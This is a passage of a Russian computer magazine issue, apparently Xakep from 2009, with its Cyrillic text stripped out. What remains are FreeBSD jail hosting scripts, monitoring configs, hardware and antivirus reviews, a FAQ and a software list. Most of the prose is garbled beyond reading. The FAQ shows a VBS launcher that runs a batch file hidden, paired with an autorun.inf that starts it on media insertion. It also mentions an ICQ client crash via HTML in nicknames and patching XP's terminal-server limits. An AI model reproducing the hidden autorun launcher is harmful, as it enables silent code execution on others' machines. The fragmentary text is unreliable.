# vi /usr/jailbase/conf/base
# ( )
SIZE=2g
#
BANDWITH=1Mbit/s


, :
# mkdir /usr/jailbase/conf
# touch /usr/jailbase/conf/
{trial,base,extra,vip}

- .

,
.
,
. addvserver,
:
# vi /usr/local/bin/addvserver
#
mkdir $JAILDIR/$IP
cp $JAILBASE/FreeBSD${OSVER}.${SIZE}.image
$JAILDIR/${IP}.image
mdconfig -a -t vnode -f
$JAILDIR/${IP}.image -u 99
mount /dev/md99c $JAILDIR/$IP
#

# /
root/.ssh

#
umount $JAILDIR/$IP
mdconfig -d -u 99

,
. startvserver

.
(set),

X 06 /126/ 09

>> SYN/ACK

+ 1.
mdconfig.
# vi /usr/local/bin/startvserver
#
MDNUM='mdconfig -n -a -t vnode -f $JAILDIR/$IP.image'
mount /dev/md${MD}c $JAILDIR/$IP
echo $MDNUM > $JAILDIR/$IP.run
#
ifconfig $IF inet alias $IP
#
FWSETNUM=$(($MDNUM+1))
ipfw set disable $FWSETNUM
ipfw add set $FWSETNUM pipe ${FWSETNUM}0 ip from any to
$IP
ipfw add set $FWSETNUM pipe ${FWSETNUM}1 ip from $IP to
any
ipfw pipe ${FWSETNUM}0 config bw $BANDWITH
ipfw pipe ${FWSETNUM}1 config bw $BANDWITH
ipfw set enable $FWSETNUM
#

stopvserver ipfw .
# vi /usr/local/bin/stopvserver
#
MDNUM=`cat $JAILDIR/$IP.run`
umount $JAILDIR/$IP
mdconfig -d -u $MDNUM
# ipfw IP-
FWSETNUM=$((MDNUM+1))
X 06 /126/ 09

ipfw delete set $FWSETNUM


ifconfig $IF inet -alias $IP

,
, , - . .
,
. C ,
,
. .
jls (
'ok' /usr/jailbase/db). - ,
.

CPU/RAM

jail- FreeBSD
. , . 2006
Google Summer
of Code , FreeBSD . FreeBSD 7.0 ,
, .
wiki.freebsd.
org/Jails. ,
.

119

>> SYN/ACK

MUNIN

/USR/JAIL

DVD
dvd
(
)
.

(
'disabled') (
$JAILDIR/$IP.trouble).
cron,
, .
.
;
, :
# vi /usr/local/bin/watchvservers
# ,

120

MONITRC
check_running()
{
# ,

jls | grep $IP && return


#
/usr/local/bin/startvserver $IP > /tmp/
startvserver.out 2>&1
sleep 15
# ?
jls | grep $IP && return
# ? ,
X 06 /126/ 09

>> SYN/ACK

MUNIN:
trouble
/usr/local/bin/disablevserver $IP
cp /tmp/startvserver.out $JAILDIR/${IP}.trouble
cat $JAILDIR/${IP}.trouble | mail -s "watchvservers:
$IP" root
exit
}
#
check_est_time()
{
# ,
if [ $CURTIME -ge $ESTTIME ]; then
/usr/local/bin/stopvserver $IP
/usr/local/bin/disablevserver $IP
#
cat $JAILDIR/${IP}.expire | mail -s "watchvservers:
$IP" root
cat /usr/
jailbase/message_expire | mail -s "www.host.com:
" $ACMAIL
fi
}

cron:
# crontab -e
MAILTO=root
*/20 * * * *

/usr/local/bin/watchvservers


. watchvservers: <IP> startvserver,
$JAILDIR/$IP.trouble.
,
.
watchvservers:
<IP>,
delvserver, (
,
/usr/jailbase/message_expire).
disabled .
mail , Sendmail/Postfix
ssmtp:
# cd /usr/ports/mail/ssmtp
X 06 /126/ 09

# make install replace clean

:
# vi /usr/local/etc/ssmtp/ssmtp.conf
# , root
root=admin@host.com
#
mailhub=mail.host.com
rewritedomain=host.com
hostname=_HOSTNAME_

, ,
,
root:
# echo root:system@'hostname' > /usr/local/etc/ssmtp/
revaliases

.
, :
;
;
CPU/RAM;
;
;
.
- ,
.

.
munin, - ,
.
. munin,

:
# cd /usr/port/sysutils/munin-node
# make install clean

:
# cd /usr/local/etc/munin
# cp munin-node.conf.sample munin-node.conf

munin-node.conf :

121

>> .PRO
SYN/ACK
# vi /usr/local/etc/munin/munin.conf
# c munin-node
[jail.host.com]
# IP
address 172.30.5.129
use_node_name yes

WATCHVSERVERS
# vi /usr/local/etc/munin/munin-node.conf
#
host_name jail.host.com
# ,
allow ^172\.168\.0\.1$"

munin
. /usr/local/share/munin/plugins,
, /usr/local/etc/munin/plugins.
:
# cd plugins
# for i in cpu df df_inode load memory netstat open_files
\
swap vmstat; do ln -s /usr/local/share/munin/
plugins/$i \
$PWD/$i; done

if_ if_errcoll_, (
):
# ln -s /usr/
local/share/munin/plugins/if_errcol_ $PWD/if_errcol_ed0

munin-node /etc/rc.conf :
# /usr/local/etc/munin-node.sh start
# echo "munin_node_enable=\"YES\"" >> /etc/rc.conf

. ,
.
( ) muninmain:
# cd /usr/ports/sysutils/munin-main
# make install clean

munin.conf:
# cd /usr/local/etc/munin
# cp munin.conf.sample munin.conf

122

. munin-cron,
cron,
, ,
/usr/local/www/munin.
, Web- ,
file:///usr/local/www/munin/index.html
.

monit, ,
. monit ,
,
,
.
monit:
# cd /usr/ports/sysutils/monit
# make install clean

:
# vi /usr/local/etc/monitrc
# : loadavg,
,
check system myhost.mydomain.tld
if loadavg (1min) > 4 then alert
if loadavg (5min) > 2 then alert
if memory usage > 85% then alert
if cpu usage (user) > 90% then alert
if cpu usage (system) > 30% then alert
if cpu usage (wait) > 20% then alert
# ""
# ad0s2 , /usr $JAILDIR
check device usrfs with path /dev/ad0s2
if space usage > 80% then alert
# sshd
check process sshd with pidfile /var/run/sshd.pid
start program = "/etc/rc.d/sshd start"
stop program = "/etc/rc.d/sshd stop"
if failed port 22 protocol ssh then restart
if 5 restarts within 5 cycles then timeout

monit /etc/rc.conf :
# echo "monit_enable=\"YES\"" >> /etc/rc.conf
# /usr/local/etc/rc.d/monit start


FreeBSD-. . -,
FreeBSD-
, . -,
. FreeBSD
,
.
X 06 /126/ 09

>> SYN/ACK

MUNIN:

,
.
FreeBSD 7.1 , , 4.11. ,
, ,
.
cvsup:
# vi ~/ports-supfile
*default host=cvsup2.ru.FreeBSD.org
*default base=/var/db
*default prefix=/usr/jailbase
*default release=cvs tag=RELENG_6_4
*default delete use-rel-suffix
*default compress
ports-all
# cvsup ~/ports-supfile
# mv /usr/jailbase/{ports,ports-6.4-RELEASE}

? ,
? :
1. . BIND, Web-
X 06 /126/ 09

. Web-
,
. ,
, , ,
.. ( PHP, Python, Perl) , addvserver
. startvserver,
SSH. , watchvservers .
2. . 15
,
.
,
Web-, BIND, Sendmail, munin
.

, munin-node, minit ssmtp, addvserver.
,
, ,
, SSH addvserver.

( delvserver).
3. . ,
/usr/jailbase/db .
.
SQL
db.
, db.

IP ,
, , .z

123

>> SYN/ACK

NATHAN BINKERT


/ NAT@SYNACK.RU /

Linux
Depo Storage NAS 1005
, ,
RAID, RAID
> :
1 eSATA
3 USB A ( )
1 USB B ( )
1 iSCSI/WAN
4 Gigabit Ethernet
> :
LCD-

web
e-mail LCD

-
( USB)
Linux

>> SYN/ACK


Depo Storage NAS 1005

> :

(50/60 )
(110/220 )

> :
5 SATA2 1

> RAID:
RAID 0, 1, 5, 6, 10, JBOD, RAID (
RAID- ), , ,

> :
Tower ( ),
(xx, ) 230230x190
5

Storage NAS
1005 Depo Computers .
, Linux
,

,
-,

,
.
RAID (0, 1, 5, 6, 10, JBOD) , -

, RAID
RAID. ,
.
RAID-
.
SATA
eSATA ,
6 ( JBOD).
- Windows, Linux, BSD, Mac OS
X , CIFS/SMB, AFP 3 (Apple Filing Protocol), NFS
v3, FTP HTTP/HTTPS.
Ethernet-, .

,
iSCSI- USB-.

web-
LCD- (
), . : e-mail
.

,
40417 ( 500 )
68126 1
.

124

X 06 /126/ 09

>> SYN/ACK
NATHAN BINKERT
/ NAT@SYNACK.RU /

Rock
iRU
iRU Rock s101U
HTTP://WWW
links
iRU Rock:
www.iru.ru/
production/pc_corp.

INFO
IBM
System x3250 M2:
> :
Intel Core 2 Duo E8400 () (3,0
, 1333 FSB, 6 L2)
> :
2 (2*1024 ) PC2-5300 (667 ) ECC
DDR2, 8 , 4

>> SYN/ACK

> :
250 SATA2,

> :
2 Intel Gigabit Ethernet (Intel
82563EB)
> :
DVD+/-RW
> :
350W
> :
1 PCI Express x8

> RAID:
SATA2 RAID-
Intel ICH9R (RAID 0, 1, 5, 10), 6

> -:
4 USB 2.0 (2 , 2 )
2 (DB-9M)
PS/2

-,
iRU,
iRU
Rock. 1U- iRU Rock
s101U,
,
.
(DHCP,
DNS, Active Directory),
web- -.
Intel Core 2 Duo
E8400 - SATA2 RAID Intel ICH9R,
6 SATA2-

RAID- 0, 1, 5 10.
, eSATA Matrix RAID,

RAID (
).
- 1U,

, .
DDR2800 (4 ). 2
Intel Gigabit Ethernet (Intel
82563EB). DVD+/-RW
SATA2 250 .

X 06 /126/ 09

info
- RAID-

XOR

RAID 5

, -
,

, .

.
Rock s101U ,
, iRU
,

( ,
IBM HP).
,
, .

125

>> SYN/ACK
GRINDER

/ GRINDER@SYNACK.RU /


, -,

>> SYN/ACK


, , , -, .
.
ESET NOD32 SMART SECURITY
BUSINESS EDITION
NOD32
.
NOD32 Smart Security Business Edition
(SMBE)
Windows 2000/XP/Vista, Windows, Novell
Netware Linux/*BSD/Solaris.

SMBE, NOD32.
,
,
.
,
SMBE, .

Smart Security.

,
NOD32,
ThreatSense.
ThreatSense


(Advanced Heuristics), ,

. ,
Smart Security
.

126

(WF) Windows.
,
,
IPv6 .
, ,
. HTTP POP3

,
. ThreatSense
(MS Outlook, Outlook Express, Windows
Mail .)
:
;
;
.

.

. ,
.
,
.

.

ESET Remote Access Server (ERA Server, ERAS).
,
,
-

.
ERAS (
)
.
, .
,
-
. , ,
.
SMBE
ERA Console (ERAC)
, , .

Smart Security, ,
ERAS. ,
, , ,
. .

SYMANTEC ENDPOINT
PROTECTION Symantec Endpoint
Protection 11.0 (SEP)
,

. Symantec Endpoint
Protection Client (SEPC).
Windows 2000/
XP/2003/Vista/2008 (32/64 ), Linux (Red
X 06 /126/ 09

>> SYN/ACK

Hat Enterprise Linux, SuSE Linux Enterprise


Server/Desktop, Novell Open Enterprise Server,
Ubuntu Debian 4.x), VMWare ESX.
SEPC
Norton AntiVirus

, .
,
Proactive ThreatScan, ,
,
.
(anti-spam) -
(web-filtering).
,

, ,
.
;
X 06 /126/ 09

. Tamper
Protection
,
.
Generic Exploit Blocking ,
, VxMS
(Veritas Mapping Service),
,
.
,
Symantec Network Access
Control,

( , )
.

,

.
. ,
,
.
:
HIPS (Host Intrusion Prevention
System).

,
. ( 100) ( Sybase).
MS SQL
2000SP3/2005. , IIS.

Symantec Endpoint Protection Manager
(SEPM), ( )
Win2k .

. ,
Symantec AntiVirus.
Windows-
,
(, ,
).

,
.
:
;
;
;
(LiveUpdate);
(Centralized
Exceptions).
, ,
SEPM .
.

, , ,
.. .


, .

KASPERSKY TOTAL SPACE


SECURITY Kaspersky Total Space
Security (KTSS),
,
. ,
, ,

: (Windows,
Linux), (Windows Mobile,

127

>> SYN/ACK

HTTP://WWW
links
ESET
www.eset.com.

www.
kaspersky.ru.

www.
drweb.com.

Symantec www.
symantec.com.

Sophos www.
sophos.com.

McAfee www.
mcafee.com.

F-Secure www.fsecure.ru.

DVD
dvd



,

Dr.Web Enterprise
Suite,

Kaspersky
Enterprise Space
Security Dr.Web
Enterprise Suite.

Kaspersky
Enterprise Space
Security

z 2009 .

128

ERA CONSOLE
Symbian), (Windows, Linux, Samba,
NetWare). , Windows
Workstations Windows, 64-, ,
:
;
;
,
IDS/IPS;
-;
.
,

Kaspersky Administration Kit, , . , ,

.

.
, ,
MMC.
.
(
][ 2009 Kaspersky Enterprise Space Security).
SQL-

MSDE 2000 SP3 Administration Kit.
.

.

Kaspersky Administration Kit


.
,
.

,
.
(,
Active Directory).
( , ..),
NetSend.

SOPHOS ENDPOINT SECURITY AND


CONTROL 8 Sophos Sophos
Endpoint Security and Control 8
, . , ,
Sophos Anti-Virus, Sophos Client Firewall.
Sophos Network Access Control. NAC

, , USB-. Sophos
Application Control
,
, , IM, VoIP, P2P. Sophos HIPS
.
Sophos
Email Security and Control
.
Windows 98 Vista, Mac OS X, *nix, NetWare.

X 06 /126/ 09

>> SYN/ACK

EM LIBRARY





ENTERPRISE
CONSOLE.


.
(Management Server), Sophos
Enterprise Console Sophos NAC Console (
Enterprise Console). EM Library (Enterprise Manager) Sophos .
EM Library.
parent- (primary secondary) ,
URL UNC . EM Library
, NAC
(remediation zone), ,
Sophos NAC .
,

.
MSDE, ,
MS SQL Server 2005.
Enterprise Console.
. ,
.
IP-,
Active Directory.
X 06 /126/ 09


SYMANTEC ENDPOINT PROTECTION
, , ,
. ,
. , - :
, drag'n'drop.
.
Active Directory .

, e-mail, .

MCAFEE TOTAL PROTECTION SERVICE


ADVANCED
SaaS (Security-as-a-Service, ),
, .
,
, , .
, ,
, , , , . ,
.
McAfee Total Protection Service Advanced (McAfee TPSA)
McAfee TPS.
, , , ,
, .
Win2k Pro SP3, WinXP
Vista ( 32 64 ), Windows 2k Server
SP3 2k8. , TPS
.
TPS ,
. e-mail, - SecurityCenter,
. , Internet Explorer
. URL Total Protection.
IE 5.5 SP2 , Opera

129

>> .PRO
SYN/ACK

KASPERSKY ADMINISTRATION KIT


Firefox. setup- .
e-mail, (URL-).

.
TPS ,
.
,
. TPS
,
.

Network Operations Center (www.
mcafeeasap.com), e-mail , . NOC , , ,
. Security Center
, ,
. Computers,
. Reports
.
, .
Groups + Policies.
Default Policy.
( 12 ).
, My Account

130

, , .
On-Demand , On-access
SiteAdvisor .
. , . ,
,
.
, Add Policy, , ,
On-Demand ,
User configures firewall Administrator configures firewall.
; peer-to-peer Rumor , ,
, .
Rumor . , NOC,
,
.
, . , , , .
,
. ,
.

F-SECURE PROTECTION SERVICE FOR


BUSINESS F-Secure Protection Service
X 06 /126/ 09

>> SYN/ACK

MCAFEE TOTAL PROTECTION SERVICE ADVANCED


for Business (PSB) : Standard
Advanced. PSB Workstation,
, Windows,
, , ,
, .
,
F-Secure. ,
-. .

(subscription code),
. PSB Workstation
.
.
. (1
, 2 , 4 ).
F-Secure, ,
.

, , ,
.
Sophos,
, , , Email NAC
. , X 06 /126/ 09

F-SECURE PSB

,
Symantec Kaspersky Lab. ESET NOD32
.
SaaS- F-Secure PSB,
,
, . z

131

>> units

/ LOZOVSKY@GAMELAND.RU /

PSYCHO:

: , , ?
- ,
, .

!
,

,

,
,
.
,
][-Psycho
( ),
.

(
, ),
,
.


,
, ,
,
.
,
, , . ,
(
)
.


, , ,
, . ,
(
, -

132

),

, ,
-
( , ), ,
.

.
,
, ,
- .

( - ,
;
,

),
(
), (,
,
).

,

.

,
,
,
. , - .
,




.


,
- ,

,

, -
.

,
,
.
,
,


.

, .
:
. ,
,
. .

,
.
,

.
.
, ,



,

, ,

.


.
.

.


, .

,
z 2008 .

.
,

,


.

-
(
-25, ), , .
.





. ,
X 05 /125/ 09

>> units
z: , ,

-,

. ,
, ?
..: , ,
( , , ) , . .
. , ,
,
.
. , .
. , . ,
. .
.
, ,
, . .
z: ? , --

..: .
, ,
, . , ,
.
, .
z: , ?

..: , , .
, . .
z: ?

..: .
, . .
,
. . ,
, . .
z: , :(
..: , , .
, .
, . , , . . , - .
.
z: , , -

? ?
.: , .
, (
)
. ,
. .
, . , ,
.
, (

) 20 . 20

X 05 /125/ 09

133

>> units
,

, .
,

,


, ,
, ,
.
(
),
, ,

,

. ,

.

, ,
LSD. !

134



. ,
;)
, ,

.
,


(LSD: my
problem child) .

,
, ,
.

:

(
)
,
(
).

,

, .


.
(.. ,
;
),
,
,

,
,
,
.

,
,
.

, .

. (,

, ,
.

X 05 /125/ 09

>> units

DIGITAL SURROUND REALITY



.
(
, ,
), (
) ( ,
).

)


-,

( ), -
.
( )
,
.


.
, ,
, ,
,

.
X 05 /125/ 09



. ,

,
(
, ),
.

,

.

,

. ,
,


,
. ,

,

( ,

,

-,
,
).
,
,
, .

,

,
. ,

, 80-,

. ,

.
(

. ,
).
,
:


:).
,
. -, (
)

.
,
.

,

,
,
.



?
: ,
, .
,
, ,
,
.

135

>> units

: !

. ,
z ,


-.
(delirium tremens).
,

, ,

,
.
, , .
-,
,


( ?). ,
,
(

). 3-4
( )

, , ,
.
,
, (, ,
, !),
,

, (..
,

136



. ,
).

, ,


.
,
, ,
,
. ,
,
.



( , ).
-

, ,
,
,

(
),

,
,
,
,
.
,


, ,
( ,

,
,
). ,


,
,
.

,
, .
Quake . , ,
/
,
.

X 06 /126/ 09

>> units

, 16-
, ,

03,

(
).
, :).
.

,
.
,

,

, , ,
. ,
,

( ,
,

X-
,
,
,
.
,
,
, .
. ,
, .
.
, , ,
.
, ,
.
( )
, . ,
.
, . ,
. ,
, .

X 06 /126/ 09

).

!
(
,
). ,
,
. ,
, ,
(
). ,
, , ,

.

, ,


( ). ,
/
. ,
().
.

.
,

,
.
,

-
. :

(50-150
)
,
, ,
,
, ,
(

) , .

, ,

,

.

, .
, , , -


! z

-,
, . -,

, -
,

;


- .
. z

137

>> units

/ ICQ 884888, HTTP://WAP-CHAT.RU /

FAQ UNITED:

Q:

A: WordPress

SSL-,

(, ),
, http://rpc.pingomatic.
com,
:

?
A: SSL-

(,
,
), 30 90
http://www.
freessl.su.

SSL- 30 (TrialSSL) FreeSSL 90
.
SSL-.
.

(, :)
: , e-mail, .
Q:
?

138

blogsearch.google.com/ping/RPC2
api.feedster.com/ping
api.my.yahoo.com/RPC2
api.my.yahoo.com/rss/ping
blogdigger.com/RPC2
blogshares.com/rpc.php
blogstreet.com/xrbin/xmlrpc.cgi
coreblog.org/ping/
ping.blo.gs/
ping.feedburner.com
ping.syndic8.com/xmlrpc.php
ping.weblogalot.com/rpc.php
popdex.com/addsite.php
rpc.blogrolling.com/pinger/
rpc.technorati.com/rpc/ping
rpc.weblogs.com/RPC2
topicexchange.com/RPC2
xping.pubsub.com/ping/
api.moreover.com/ping

rpc.icerocket.com:10080/
ping.blogs.yandex.ru/RPC2


, ,
, ,
.
Q: .
IP-
UserAgent ?
A:

iplists.com.
, ,
:
1. Google IP List IP-
,
;
2. Yahoo, Lycos, InfoSeek, Alta Vista, Excite,
Northern Light IP List
.

.
SEO!
X 06 /126/ 09

>> units

Q: ICQ-
, -

. .
A: ,

Q: , - -

( , Lite, 6 6.5)
Hormold Doom123. DoS-.

html- </a>, ,
(,

).
- .
<h1>nick</h1> ,
. ,
- ( , (1/1)),
- :).
: securitylab.ru/vulnerability/368757.php :
forum.asechka.ru/showthread.php?t=110269.

Q: .
?
A: -

Site-Auditor ( : site-auditor.ru).
Site-Auditor
,
, :
1.
Google PageRank;
2. ,
, ,
Google, Yahoo;
3. ,
Google, , Yahoo;
4. ,
Top100, DMOZ;
5.
Top100,

7 .
Top.Mail.ru, LiveInternet (Rax),
SpyLog, HotLog, .


,
,
, .
,
X 06 /126/ 09

?
A: -


IP- ( /
IP). , ,
WIP-Base WIPmania.
com ( GeoIP-
). ,
, IP-.
:
1. SQL, CIDR, ;
2. WIP-
;
3. .

: WIP-API (
), WIP-Plugin (WorldIP
Mozilla Firefox) WIP-Map (IP- ).

, .
Q: ,

A: , :)

,
ajax-
life_is_shit.

1. Atlas ASP.NET AJAX Microsoft


(http://www.asp.net/ajax/Default.aspx)
+ asp
-
-
2. Dojo Javascript (http://
dojotoolkit.org)
+
+
+
3. jQuery JavaScript- (http://jquery.com)
+
+
4. Google Web Toolkit
Java- Google (http://code.
google.com/webtoolkit)
+
-
5. Prototype Ruby on Rails (http://prototypejs.org)
+
+

.bat-?
A: ,

,
.

:
1. myfile.vbs,
Set WshShell =
CreateObject("WScript.Shell")
WshShell.Run "cmd.exe /c [_BAT_
]", 0, false

2. :
[AutoRun]
UseAutoPlay=1
open=myfile.vbs

6. Mootools javascript- (http://mootools.net)


+
+
+
+
7. Moo.fx prototype mootools
(http://moofx.mad4milk.net)
+
+
8. xajax (http://www.xajaxproject.org)
+
+ ( ..)
9. sajax ,
(http://www.ibm.com/developerworks/ru/library/
os-phpajax)
+
-

Q: -

ajax-.
,
?

10. JsHTTPRequest (http://dklab.ru/lib/


JsHttpRequest)
+
+ prototype

139

>> units
+

11. MochiKit (http://mochikit.


com/download.html)
+
+
-
12. YUI Yahoo(http://
developer.yahoo.com/yui)
+
+ ( 260)
+

.
, (
),
,
. ,
Thinstation
(thinstation.sourceforge.net),
Linux. : ElinuxT
(elinux.org.ru), WTPRO (www.wtpro.ru).
Q: ,
PayPal. , ,
, -
?

Q: / PHP,

A: , -

. ,


PayPal.
.


.
,
.

.
,
,
, .
, .
! . ,
, ,

.

vendor 2heckout.com.
, ,

. 2heckout,

,

. ,
( !)
, PayPal 2heckout.
!
. 2heckout (
$49), (,
),
,
.
, --,
. ?
Payoneer (www.payoneer.
com). ,
,

?
A: ,

,

php.ini:
default_socket_timeout = 600 (
)
max_execution_time = 300000 ( ,
)
max_input_time = 600 (
)
memory_limit = 256M (
, )

, PHP
,
.
Q: Windows XP
(terminal
server)?
A: ,

XP ( Professional, Home)
,
RPD.

,
. , ,
. TS-Free , ,
, . crypt.dll
- (
).
Termiserv_XPSP2_i386.

XPUnlimited (www.xpunlimited.com),
,
. SSL Gateway,
RPD-
. WinConnect
Server XP (www.ef1.ru/soft/winconnectserverxp/
index.htm)
, , , .
,

140


. payoneer
,
2heckout
. ,
, ,
.

.
( Google,
), PayPal
Webmonet ..
,
PayPal
(
), .
,
, 2heckout
Payoneer .
Q: . ?
A:

Phoenix JAF.
()
, Nokia. http://forum.allnokia.ru/
viewtopic.php?t=44556
:
Normal Dead (Phoenix, JAF);
Downgrading (JAF);
Phoenix Browser
()
(Phoenix);
MobiMB Browser USB,
Bluetooth, IrDa () (MobiMB);

- Nokia (Phoenix)
Product Profile
*.ppu (Phoenix)
Format C
(Phoenix,
JAF)
Product Profile *.pp (Phoenix, JAF);
, , Phonebook.txt
(Phoenix)
, c Permanent
Memory (PM)
(Phoenix, JAF);
- (Phoenix, JAF);
(JAF,
Nokia Unlocker);
(Nokia
Unlocker);
,
java- java- (Phoenix);
, Testing (Phoenix);
Phoenix : F5
Normal Mode, F6 Local Mode, F7 Test Mode. z
X 06 /126/ 09

>Multimedia
Blender 2.49
BurnAware Free 2.3.5
CCCP (Combined Community Codec
Pack) 2009-05-08
doPDF6.2
Format Factory 1.85
MediaMonkey 3.0.7.1191
Nero Lite 8.3.13.0
Picasa 3.1
Poladroid 0.9.6r0b
priPrinter 2.5
ProgDVB 6.06.4
Screenshot Captor 2.56.01

>Misc
Benubird PDF 1.4.0.1
Direct Folders 3.6
Executor 0.99
Fences 0.96
Folder Menu 2.00 beta 9
Gmail Notifier Plus 1.0
Klipfolio Personal Dashboard 5.1
LogonStudio Vista 1
MemInfo 2.1
PSGlass
SugarSync Manager 1.6.3
Vispa 0.5.1
ZenKEY 2.1.1

>Games
And Yet It Moves Demo 1.0.3
CeeBot4 2.0
Robocode 1.7.1.2

>Development
Adobe Flash Catalyst 1.0 Beta
HeidiSQL 4.0
HttpWatch Basic Edition 6.1.36
Inno Setup 5.3.2
Microsoft Web Platform Installer
2.0 Beta
RJ TextEd 5.23

>>WINDOWS
>Dailysoft
7-Zip 4.65
AIMP 2.51
Autoruns 9.41
DAEMON Tools Lite 4.30.3
Download Master 5.5.11.1167
FarPowerPack 1.15
FileZilla 3.2.4.1
K-Lite Mega Codec Pack 4.80
Miranda IM 0.7.19
Mozilla Firefox 3.0.10
Notepad++ 5.3.1
Opera 9.64
PuTTY 0.60
QIP Infium RC4 Build 9030
Skype 4.04.0
Total Commander 7.04a
Unlocker 1.8.7
Xakep CD DataSaver 5.2
XnView 1.96

>>UNIX
>Desktop
Audacious 2.0.1
Audacity 1.3.7
Beesoft Commander 4.1.0

>12 Wi-Fi
Aircrack-ng 1.0-rc3
Asleap 2.2
CommView for WiFi 6.1
inSSIDer 1.2 Beta
Kismet-2009-05-RC2
NetStumbler 0.4.0
Technitium MAC Address Changer
v5 Release 3
Vistumber 9.3
Void11 0.2.0
WifiZoo 1.3
Wireless Security Auditor 1.02
WirelessKeyView 1.26

>System
#7Z Windows 0.8.0
3DP Chip 9.05
Almeza MultiSet Professional 6.6
avast! Home Edition 4.8
Defraggler 1.10.143
Dexpot 1.4.2
Double Driver 2.1
Prism 1.0b1
SpeedFan 4.38
Sysinternals Suite Build 050709
Total Commander (Beta) 7.50 Beta 4
VirtualBox 2.2.4

>Security
Flexcrypt 2.9.0
Multi Password Recovery (MPR)
1.1.5
Spy Message 1.0.0.0
TrueCrypt 6.2

>Net
Awasu 2.4
CrossLoop
Google Chrome 3.0.182.2 Beta
Kerio WinRoute Firewall 6.6.0
LogMeIn Free 4.0.784
Maxthon Browser 2.5.1
myibay 1.0.40
NetCrunch 5.2
Orbit Downloader 2.8.11
Pidgin 2.5.6
Psi 0.12.1
Remote Process Explorer 2.0.0.19
Skype for Windows 4.1.0
twhirl 0.9.2
UltraSurf 9.4
webcamXP 5.3.4.110
WebCopier 5.1
Winfox

Stellarium 0.10.2
TagScanner 5.1.540b
VideoInspector 2.2.2.121

>Net
assniffer 0.2
AutoScan 1.42
BitWise 1.7.3
FireFox 3.0.10
Flock 2.5
IcePodder 5.4
IMPOMEZIA Simple Chat 0.5.3
Ktrafficanalyzer 0.4.0-1
KVIrc 3.4.2
Mizio 0.3.1
Opera 9.64
SIM IM 0.9.4.3
Twitux 0.69
BitFlu 0.90
Deluge 1.1.8
KTorrent 3.2.1

>Games
PokerTH 0.7
Regame
SudokuKi 0.9.14

>Devel
Agave 0.4.4
Clojure 1.0
Diffuse 0.3.3
Dojo Toolkit 1.3.1
GiftWrap 0.1
GSQL 0.2.1
Highlight 2.9
Jdk 6update14
KLone 2.2.0
Kompozer 0.7.10
log4c 1.2.1
log4cpp 1.0
log4j 1.2.15
Regexpplanner 1.0
SciTE 1.77
Screenlets 0.1.2
Spket IDE 1.6.16
XPontus XML Editor 1.0.0.2

DIA 0.97
Evince 2.27.1
Florence 0.4.1
Fontmatrix 0.4.2
Fotoxx 6.9.2
FreeCAD 0.7
Freespeak 0.3.0
Frinika 0.5.1
keyTouch 2.4.1
Kid3 1.2
KOffice 2.0.0
LiVES 0.9.9.8
Metromap 0.1.2
OpenXMLViewer 1.0
PeaZip 2.6
QPDFMerge 1.0
Remuco 0.8.2
SMPlayer 0.6.7
Subsonic 3.6
xCHM 1.16
Xcowsay 1.1
Xpdf 3.02

>X-distr
Mandriva 2009.1

>System
Areca Backup 7.1.1
ATI 9.5
Bochs 2.4
Freefilesync 1.18
GParted 0.4.5
Linux Kernel 2.6.29.4
Memory monitor 1.1
nVidia 180.60
QGRUBEditor 2.5.0
Realtek Audio Codecs 5.11
StopDuplicates 1.4 Beta
watsup 1.7
Xen 3.4.0

>Server
Abyss Web Server X1 2.6
Anemon DHCP server 0.4
AOLserver 4.5.1
Asterisk 1.6.1.0
Ejabberd 2.0.5
Iserverd 2.5.5
MaraDNS 1.3.07.09
Monkeyd 0.9.2
MyDNS 1.1.0
Nginx 0.7.59
Openfire 3.6.4
OpenSSH 5.2
Sockso 1.1.8
Webalizer 2.21
wzdftpd 0.8.3
XMail 1.25

>Security
CompuSec 4.21
Fwknop 1.9.11
Fwsnort 1.0.6
KeePassX 0.4.0
MultiInjector 0.3
Onesixtyone 0.3.2
Porkbind 1.3
Ratproxy 1.58
Samurai 0.6
Sara 7.8.4
Sshutout 1.0.5
Stunnel 4.27
TLSWrap 1.04
TrueCrypt 6.2

Lince 1.1beta
qBittorrent 1.3.3
QTorrent 0.9.5
rTorrent 0.8.2
Transmission 1.61
YouTube Downloader+ 1.8

06(126) 2009


2100 . ( 15%
)

. ,

!
!

+ + DVD:

- 155 ( 25% , )
12

3720

2100

+DVD 6
1200 .

1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .

:

;
20
.
,
.
, . ,
, .

, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru

http://

WWW2
2

?
WWW.VSELISDELAL.RU

,
.
! , ,
,
! 8-800-100-3342,
, . : .

, ?

SHAREBEE
WWW.SHAREBEE.COM

- .
: rapidshare,
depositfiles. , , Sharebee.com.
.
, , .


MAC-

FINDAMAC
GORLANI.COM/TOOLS/FINDAMAC


MAC- . 6
MAC, , , ,
Findamac, , . . ,
.

144

ENCODEIT
ENCODEIT.ORG

,
. , 700
, EncodeIt
Youtube, Rutube VKontakte,
. ,

. , EncodeIt
.
X 06 /126/ 09